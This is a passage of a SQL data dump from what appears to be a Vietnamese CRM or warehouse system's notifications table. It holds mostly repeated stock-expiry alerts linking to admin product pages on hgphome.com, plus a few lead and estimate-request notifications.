(4445, 1, 1, '2024-01-29 22:02:06', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=331', 'a:0:{}'),
(4446, 1, 1, '2024-01-29 22:02:06', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=331', 'a:1:{i:0;s:16:\"Form_HamiltonAir\";}'),
(4454, 1, 1, '2024-01-30 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4455, 1, 1, '2024-01-30 08:15:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4456, 1, 1, '2024-01-30 08:30:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4457, 1, 1, '2024-01-30 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4463, 1, 1, '2024-01-31 08:00:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4464, 1, 1, '2024-01-31 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4465, 1, 1, '2024-01-31 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4466, 1, 1, '2024-01-31 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4467, 1, 1, '2024-02-01 08:00:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4468, 1, 1, '2024-02-01 08:15:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4469, 1, 1, '2024-02-01 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4470, 1, 1, '2024-02-01 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4471, 1, 1, '2024-02-02 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4472, 1, 1, '2024-02-02 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4473, 1, 1, '2024-02-02 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4474, 1, 1, '2024-02-02 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4475, 1, 1, '2024-02-03 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4476, 1, 1, '2024-02-03 08:15:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4477, 1, 1, '2024-02-03 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4478, 1, 1, '2024-02-03 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4479, 1, 1, '2024-02-04 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4480, 1, 1, '2024-02-04 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4481, 1, 1, '2024-02-04 08:30:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4482, 1, 1, '2024-02-04 08:45:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4483, 1, 1, '2024-02-05 08:00:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4484, 1, 1, '2024-02-05 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4485, 1, 1, '2024-02-05 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4486, 1, 1, '2024-02-05 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4487, 1, 1, '2024-02-06 08:00:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4488, 1, 1, '2024-02-06 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4489, 1, 1, '2024-02-06 08:30:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4490, 1, 1, '2024-02-06 08:45:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4491, 1, 1, '2024-02-07 00:15:31', 'estimate_request_assigned_to_staff', 0, 0, '', 1, NULL, 'estimate_request/view/69', 'a:0:{}'),
(4500, 1, 1, '2024-02-07 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
